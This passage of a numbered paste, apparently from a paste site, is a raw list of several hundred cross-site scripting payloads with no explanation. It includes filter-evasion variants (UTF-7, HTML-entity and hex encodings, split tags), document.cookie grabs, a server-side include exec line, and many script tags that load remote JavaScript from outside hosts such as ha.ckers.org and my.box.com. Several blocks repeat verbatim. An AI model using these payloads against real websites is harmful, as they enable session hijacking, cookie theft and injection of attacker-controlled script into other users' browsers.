  1083. <script>({0:#0=alert/#0#/#0#(123)})</script>
  1084. <script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script>
  1085. <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
  1086. <script src="#">{alert(1)}</script>;1
  1087. <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
  1088. <svg xmlns="#"><script>alert(1)</script></svg>
  1089. <svg onload="javascript:alert(123)" xmlns="#"></svg>
  1090. <iframe xmlns="#" src="javascript:alert(1)"></iframe>
  1091. +ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
  1092. %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
  1093. +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
  1094. %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
  1095. %253cscript%253ealert(document.cookie)%253c/script%253e
  1096. “><s”%2b”cript>alert(document.cookie)</script>
  1097. “><ScRiPt>alert(document.cookie)</script>
  1098. “><<script>alert(document.cookie);//<</script>
  1099. foo%00<script>alert(document.cookie)</script>
  1100. <scr<script>ipt>alert(document.cookie)</scr</script>ipt>
  1101. %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
  1102. ‘; alert(document.cookie); var foo=’
  1103. foo\’; alert(document.cookie);//’;
  1104. </script><script >alert(document.cookie)</script>
  1105. <img src=asdf onerror=alert(document.cookie)>
  1106. <BODY ONLOAD=alert(’XSS’)>
  1107. <script>alert(1)</script>
  1108. "><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
  1109. <video src=1 onerror=alert(1)>
  1110. <audio src=1 onerror=alert(1)>
  1111. <script>alert(123)</script>
  1112. <script>alert("hellox worldss");</script>
  1113. javascript:alert("hellox worldss")
  1114. <img src="javascript:alert('XSS');">
  1115. <img src=javascript:alert(&quot;XSS&quot;)>
  1116. <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  1117. <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
  1118. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  1119. <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
  1120. <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  1121. <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  1122. <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  1123. <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  1124. <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  1125. <<SCRIPT>alert("XSS");//<</SCRIPT>
  1126. <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  1127. ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
  1128. <script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
  1129. <script>alert("XSS");</script>&search=1
  1130. 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
  1131. <h1><font color=blue>hellox worldss</h1>
  1132. <BODY ONLOAD=alert('hellox worldss')>
  1133. <input onfocus=write(XSS) autofocus>
  1134. <input onblur=write(XSS) autofocus><input autofocus>
  1135. <body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  1136. <form><button formaction="javascript:alert(XSS)">lol
  1137. <!--<img src="--><img src=x onerror=alert(XSS)//">
  1138. <![><img src="]><img src=x onerror=alert(XSS)//">
  1139. <style><img src="</style><img src=x onerror=alert(XSS)//">
  1140. <? foo="><script>alert(1)</script>">
  1141. <! foo="><script>alert(1)</script>">
  1142. </ foo="><script>alert(1)</script>">
  1143. <? foo="><x foo='?><script>alert(1)</script>'>">
  1144. <! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">
  1145. <% foo><x foo="%><script>alert(123)</script>">
  1146. <div style="font-family:'foo&#10;;color:red;';">LOL
  1147. LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
  1148. <script>({0:#0=alert/#0#/#0#(0)})</script>
  1149. <svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>
  1150. &lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt;
  1151. \\";alert('XSS');//
  1152. &lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\"XSS\");&lt;/SCRIPT&gt;
  1153. &lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript&#058;alert('XSS');\"&gt;
  1154. &lt;BODY BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
  1155. &lt;BODY ONLOAD=alert('XSS')&gt;
  1156. &lt;IMG DYNSRC=\"javascript&#058;alert('XSS')\"&gt;
  1157. &lt;IMG LOWSRC=\"javascript&#058;alert('XSS')\"&gt;
  1158. &lt;BGSOUND SRC=\"javascript&#058;alert('XSS');\"&gt;
  1159. &lt;BR SIZE=\"&{alert('XSS')}\"&gt;
  1160. &lt;LAYER SRC=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/LAYER&gt;
  1161. &lt;LINK REL=\"stylesheet\" HREF=\"javascript&#058;alert('XSS');\"&gt;
  1162. &lt;LINK REL=\"stylesheet\" HREF=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;css\"&gt;
  1163. &lt;STYLE&gt;@import'http&#58;//ha&#46;ckers&#46;org/xss&#46;css';&lt;/STYLE&gt;
  1164. &lt;META HTTP-EQUIV=\"Link\" Content=\"&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\"&gt;
  1165. &lt;STYLE&gt;BODY{-moz-binding&#58;url(\"http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\")}&lt;/STYLE&gt;
  1166. &lt;XSS STYLE=\"behavior&#58; url(xss&#46;htc);\"&gt;
  1167. &lt;STYLE&gt;li {list-style-image&#58; url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
  1168. &lt;IMG SRC='vbscript&#058;msgbox(\"XSS\")'&gt;
  1169. &lt;IMG SRC=\"mocha&#58;&#91;code&#93;\"&gt;
  1170. &lt;IMG SRC=\"livescript&#058;&#91;code&#93;\"&gt;
  1171. žscriptualert(EXSSE)ž/scriptu
  1172. &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript&#058;alert('XSS');\"&gt;
  1173. &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&gt;
  1174. &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&#58;//;URL=javascript&#058;alert('XSS');\"
  1175. &lt;IFRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/IFRAME&gt;
  1176. &lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/FRAMESET&gt;
  1177. &lt;TABLE BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
  1178. &lt;TABLE&gt;&lt;TD BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
  1179. &lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt;
  1180. &lt;DIV STYLE=\"background-image&#58;\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028&#46;1027\0058&#46;1053\0053\0027\0029'\0029\"&gt;
  1181. &lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt;
  1182. &lt;DIV STYLE=\"width&#58; expression(alert('XSS'));\"&gt;
  1183. &lt;STYLE&gt;@im\port'\ja\vasc\ript&#58;alert(\"XSS\")';&lt;/STYLE&gt;
  1184. &lt;IMG STYLE=\"xss&#58;expr/*XSS*/ession(alert('XSS'))\"&gt;
  1185. &lt;XSS STYLE=\"xss&#58;expression(alert('XSS'))\"&gt;
  1186. exp/*&lt;A STYLE='no\xss&#58;noxss(\"*//*\");
  1187. xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'&gt;
  1188. &lt;STYLE TYPE=\"text/javascript\"&gt;alert('XSS');&lt;/STYLE&gt;
  1189. &lt;STYLE&gt;&#46;XSS{background-image&#58;url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
  1190. &lt;STYLE type=\"text/css\"&gt;BODY{background&#58;url(\"javascript&#058;alert('XSS')\")}&lt;/STYLE&gt;
  1191. &lt;!--&#91;if gte IE 4&#93;&gt;
  1192. &lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;
  1193. &lt;!&#91;endif&#93;--&gt;
  1194. &lt;BASE HREF=\"javascript&#058;alert('XSS');//\"&gt;
  1195. &lt;OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/OBJECT&gt;
  1196. &lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert('XSS')&gt;&lt;/OBJECT&gt;
  1197. &lt;EMBED SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;swf\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt;
  1198. &lt;EMBED SRC=\"data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt;
  1199. a=\"get\";
  1200. b=\"URL(\\"\";
  1201. c=\"javascript&#058;\";
  1202. d=\"alert('XSS');\\")\";
  1203. eval(a+b+c+d);
  1204. &lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\"xss\" implementation=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;htc\"&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt;
  1205. &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\"javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert('XSS');\"&gt;&#93;&#93;&gt;
  1206. &lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
  1207. &lt;XML ID=\"xss\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\"javas&lt;!-- --&gt;cript&#58;alert('XSS')\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
  1208. &lt;SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"&gt;&lt;/SPAN&gt;
  1209. &lt;XML SRC=\"xsstest&#46;xml\" ID=I&gt;&lt;/XML&gt;
  1210. &lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
  1211. &lt;HTML&gt;&lt;BODY&gt;
  1212. &lt;?xml&#58;namespace prefix=\"t\" ns=\"urn&#58;schemas-microsoft-com&#58;time\"&gt;
  1213. &lt;?import namespace=\"t\" implementation=\"#default#time2\"&gt;
  1214. &lt;t&#58;set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\"&gt;
  1215. &lt;/BODY&gt;&lt;/HTML&gt;
  1216. &lt;SCRIPT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg\"&gt;&lt;/SCRIPT&gt;
  1217. &lt;!--#exec cmd=\"/bin/echo '&lt;SCR'\"--&gt;&lt;!--#exec cmd=\"/bin/echo 'IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;'\"--&gt;
  1218. &lt;? echo('&lt;SCR)';
  1219. echo('IPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;'); ?&gt;
  1220. &lt;IMG SRC=\"http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode\"&gt;
  1221. Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser
  1222. &lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\"&gt;
  1223. &lt;HEAD&gt;&lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
  1224. &lt;SCRIPT a=\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  1225. &lt;SCRIPT =\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  1226. &lt;SCRIPT a=\"&gt;\" '' SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  1227. &lt;SCRIPT \"a='&gt;'\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  1228. &lt;SCRIPT a=`&gt;` SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  1229. &lt;SCRIPT a=\"&gt;'&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  1230. &lt;SCRIPT&gt;document&#46;write(\"&lt;SCRI\");&lt;/SCRIPT&gt;PT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  1231. &lt;A HREF=\"http&#58;//66&#46;102&#46;7&#46;147/\"&gt;XSS&lt;/A&gt;
  1232. &lt;A HREF=\"http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"&gt;XSS&lt;/A&gt;
  1233. &lt;A HREF=\"http&#58;//1113982867/\"&gt;XSS&lt;/A&gt;
  1234. &lt;A HREF=\"http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\"&gt;XSS&lt;/A&gt;
  1235. &lt;A HREF=\"http&#58;//0102&#46;0146&#46;0007&#46;00000223/\"&gt;XSS&lt;/A&gt;
  1236. &lt;A HREF=\"htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\"&gt;XSS&lt;/A&gt;
  1237. &lt;A HREF=\"//www&#46;google&#46;com/\"&gt;XSS&lt;/A&gt;
  1238. &lt;A HREF=\"//google\"&gt;XSS&lt;/A&gt;
  1239. &lt;A HREF=\"http&#58;//ha&#46;ckers&#46;org@google\"&gt;XSS&lt;/A&gt;
  1240. &lt;A HREF=\"http&#58;//google&#58;ha&#46;ckers&#46;org\"&gt;XSS&lt;/A&gt;
  1241. &lt;A HREF=\"http&#58;//google&#46;com/\"&gt;XSS&lt;/A&gt;
  1242. &lt;A HREF=\"http&#58;//www&#46;google&#46;com&#46;/\"&gt;XSS&lt;/A&gt;
  1243. &lt;A HREF=\"javascript&#058;document&#46;location='http&#58;//www&#46;google&#46;com/'\"&gt;XSS&lt;/A&gt;
  1244. &lt;A HREF=\"http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/\"&gt;XSS&lt;/A&gt;
  1245. &lt;
  1246. %3C
  1247. &lt
  1248. &lt;
  1249. &LT
  1250. &LT;
  1251. &#60
  1252. &#060
  1253. &#0060
  1254. &#00060
  1255. &#000060
  1256. &#0000060
  1257. &lt;
  1258. &#x3c
  1259. &#x03c
  1260. &#x003c
  1261. &#x0003c
  1262. &#x00003c
  1263. &#x000003c
  1264. &#x3c;
  1265. &#x03c;
  1266. &#x003c;
  1267. &#x0003c;
  1268. &#x00003c;
  1269. &#x000003c;
  1270. &#X3c
  1271. &#X03c
  1272. &#X003c
  1273. &#X0003c
  1274. &#X00003c
  1275. &#X000003c
  1276. &#X3c;
  1277. &#X03c;
  1278. &#X003c;
  1279. &#X0003c;
  1280. &#X00003c;
  1281. &#X000003c;
  1282. &#x3C
  1283. &#x03C
  1284. &#x003C
  1285. &#x0003C
  1286. &#x00003C
  1287. &#x000003C
  1288. &#x3C;
  1289. &#x03C;
  1290. &#x003C;
  1291. &#x0003C;
  1292. &#x00003C;
  1293. &#x000003C;
  1294. &#X3C
  1295. &#X03C
  1296. &#X003C
  1297. &#X0003C
  1298. &#X00003C
  1299. &#X000003C
  1300. &#X3C;
  1301. &#X03C;
  1302. &#X003C;
  1303. &#X0003C;
  1304. &#X00003C;
  1305. &#X000003C;
  1306. \x3c
  1307. \x3C
  1308. \u003c
  1309. \u003C
  1310. &lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt;
  1311. &lt;IMG SRC=\"javascript&#058;alert('XSS')\"
  1312. &lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt;
  1313. &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt;
  1314. &lt;&lt;SCRIPT&gt;alert(\"XSS\");//&lt;&lt;/SCRIPT&gt;
  1315. &lt;SCRIPT/SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  1316. &lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\&#93;^`=alert(\"XSS\")&gt;
  1317. &lt;SCRIPT/XSS SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  1318. &lt;IMG SRC=\" javascript&#058;alert('XSS');\"&gt;
  1319. perl -e 'print \"&lt;SCR\0IPT&gt;alert(\\"XSS\\")&lt;/SCR\0IPT&gt;\";' &gt; out
  1320. perl -e 'print \"&lt;IMG SRC=java\0script&#058;alert(\\"XSS\\")&gt;\";' &gt; out
  1321. &lt;IMG SRC=\"jav&#x0D;ascript&#058;alert('XSS');\"&gt;
  1322. &lt;IMG SRC=\"jav&#x0A;ascript&#058;alert('XSS');\"&gt;
  1323. &lt;IMG SRC=\"jav&#x09;ascript&#058;alert('XSS');\"&gt;
  1324. &lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt;
  1325. &lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt;
  1326. &lt;IMG SRC=javascript&#058;alert('XSS')&gt;
  1327. &lt;IMG SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt;
  1328. &lt;IMG \"\"\"&gt;&lt;SCRIPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;\"&gt;
  1329. &lt;IMG SRC=`javascript&#058;alert(\"RSnake says, 'XSS'\")`&gt;
  1330. &lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt;
  1331. &lt;IMG SRC=JaVaScRiPt&#058;alert('XSS')&gt;
  1332. &lt;IMG SRC=javascript&#058;alert('XSS')&gt;
  1333. &lt;IMG SRC=\"javascript&#058;alert('XSS');\"&gt;
  1334. &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;
  1335. '';!--\"&lt;XSS&gt;=&{()}
  1336. ';alert(String&#46;fromCharCode(88,83,83))//\';alert(String&#46;fromCharCode(88,83,83))//\";alert(String&#46;fromCharCode(88,83,83))//\\";alert(String&#46;fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\"&gt;'&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt;
  1337. ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  1338. '';!--"<XSS>=&{()}
  1339. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
  1340. <IMG SRC="javascript:alert('XSS');">
  1341. <IMG SRC=javascript:alert('XSS')>
  1342. <IMG SRC=javascrscriptipt:alert('XSS')>
  1343. <IMG SRC=JaVaScRiPt:alert('XSS')>
  1344. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  1345. <IMG SRC=" &#14; javascript:alert('XSS');">
  1346. <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  1347. <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  1348. <<SCRIPT>alert("XSS");//<</SCRIPT>
  1349. <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
  1350. \";alert('XSS');//
  1351. </TITLE><SCRIPT>alert("XSS");</SCRIPT>
  1352. ¼script¾alert(¢XSS¢)¼/script¾
  1353. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
  1354. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  1355. <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
  1356. <TABLE BACKGROUND="javascript:alert('XSS')">
  1357. <TABLE><TD BACKGROUND="javascript:alert('XSS')">
  1358. <DIV STYLE="background-image: url(javascript:alert('XSS'))">
  1359. <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
  1360. <DIV STYLE="width: expression(alert('XSS'));">
  1361. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
  1362. <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
  1363. <XSS STYLE="xss:expression(alert('XSS'))">
  1364. exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
  1365. <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
  1366. a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
  1367. <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
  1368. <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML>
  1369. <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  1370. <form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION
  1371. <form><button formaction="javascript:alert(123)">crosssitespt
  1372. <frameset onload=alert(123)>
  1373. <!--<img src="--><img src=x onerror=alert(123)//">
  1374. <style><img src="</style><img src=x onerror=alert(123)//">
  1375. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
  1376. <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
  1377. <embed src="javascript:alert(1)">
  1378. <? foo="><script>alert(1)</script>">
  1379. <! foo="><script>alert(1)</script>">
  1380. </ foo="><script>alert(1)</script>">
  1381. <script>({0:#0=alert/#0#/#0#(123)})</script>
  1382. <script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script>
  1383. <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
  1384. <script src="#">{alert(1)}</script>;1
  1385. <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
  1386. <svg xmlns="#"><script>alert(1)</script></svg>
  1387. <svg onload="javascript:alert(123)" xmlns="#"></svg>
  1388. <iframe xmlns="#" src="javascript:alert(1)"></iframe>
  1389. +ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
  1390. %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
  1391. +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
  1392. %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
  1393. %253cscript%253ealert(document.cookie)%253c/script%253e
  1394. “><s”%2b”cript>alert(document.cookie)</script>
  1395. “><ScRiPt>alert(document.cookie)</script>
  1396. “><<script>alert(document.cookie);//<</script>
  1397. foo%00<script>alert(document.cookie)</script>
  1398. <scr<script>ipt>alert(document.cookie)</scr</script>ipt>
  1399. %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
  1400. ‘; alert(document.cookie); var foo=’
  1401. foo\’; alert(document.cookie);//’;
  1402. </script><script >alert(document.cookie)</script>
  1403. <img src=asdf onerror=alert(document.cookie)>
  1404. <BODY ONLOAD=alert(’XSS’)>
  1405. <script>alert(1)</script>
  1406. "><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
  1407. <video src=1 onerror=alert(1)>
  1408. <audio src=1 onerror=alert(1)>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement